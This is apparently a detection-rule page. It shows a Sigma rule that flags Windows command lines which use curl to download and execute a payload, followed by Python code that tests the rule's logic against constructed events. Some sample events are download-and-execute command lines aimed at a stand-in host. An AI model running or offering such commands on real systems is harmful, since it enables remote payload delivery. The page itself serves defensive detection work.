Curl Download And Execute Combination
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Sigma rule
```yaml
title: Curl Download And Execute Combination
id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
status: test
description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
references:
    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
date: 2020/01/13
modified: 2024/03/05
tags:
    - attack.defense_evasion
    - attack.t1218
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|windash: ' -c '
        CommandLine|contains|all:
            - 'curl '
            - 'http'
            - '-o'
            - '&'
    condition: selection
falsepositives:
    - Unknown
level: high
```
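To see how the selection above behaves, here is an added example (not code from the Sigma project) that re-implements the rule's matching logic in Python and runs it over constructed process-creation command lines. It assumes the `windash` modifier expands `-` to `/` and the en dash, em dash and horizontal bar, as current pySigma does, and that Sigma `contains` is case-insensitive.

```python
"""Added example: evaluate rule 21dd6d38-2b18-4453-9404-a0fe4a0cc288 against
constructed process-creation events. Not part of the Sigma rule repository."""

# Assumption: the dash variants the Sigma `windash` modifier generates
# (ASCII hyphen, slash, en dash, em dash, horizontal bar).
WINDASH_VARIANTS = ["-", "/", "\u2013", "\u2014", "\u2015"]

# Constructed sample CommandLine values (example.invalid is a reserved TLD).
SAMPLE_EVENTS = [
    # 1: cmd with /c, curl, http, -o and & -> should match (windash covers /c)
    r"cmd.exe /c curl http://example.invalid/a.exe -o C:\Users\Public\a.exe & C:\Users\Public\a.exe",
    # 2: same pattern with -c and mixed case -> should match (case-insensitive)
    r"CMD.EXE -c CURL https://example.invalid/b.exe -o b.exe & b.exe",
    # 3: plain download without ' -c ' or '&' -> should not match
    r"curl https://example.invalid/file.txt -o file.txt",
    # 4: cmd /c with '&' but no curl -> should not match
    r"cmd.exe /c dir & echo done",
]


def windash_variants(value: str) -> list[str]:
    """Expand a value as Sigma `windash` does: one copy per dash variant."""
    return [value.replace("-", d) for d in WINDASH_VARIANTS]


def contains_all(cmdline: str, needles: list[str]) -> bool:
    """Sigma `contains|all`: every needle is a case-insensitive substring."""
    low = cmdline.lower()
    return all(n.lower() in low for n in needles)


def matches_curl_download_execute(cmdline: str) -> bool:
    """Selection of the rule: windash ' -c ' AND all of curl/http/-o/&."""
    low = cmdline.lower()
    # CommandLine|contains|windash: ' -c '
    has_c_flag = any(v.lower() in low for v in windash_variants(" -c "))
    # CommandLine|contains|all: - 'curl ' - 'http' - '-o' - '&'
    # Note: '-o' has no windash modifier, so '/o' would not satisfy it.
    return has_c_flag and contains_all(cmdline, ["curl ", "http", "-o", "&"])


def evaluate(events: list[str]) -> list[bool]:
    """Return the rule verdict for each event, in order."""
    return [matches_curl_download_execute(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("ALERT " if hit else "ok    ", event)
```

Events 1 and 2 trigger the rule, events 3 and 4 do not; the `-o` needle is deliberately not windash-expanded, matching the rule as written.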
Related rules
- Import LDAP Data Interchange Format File Via Ldifde.EXE
- File Download Via Windows Defender MpCmpRun.EXE
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE
- Password Protected ZIP File Opened (Suspicious Filenames)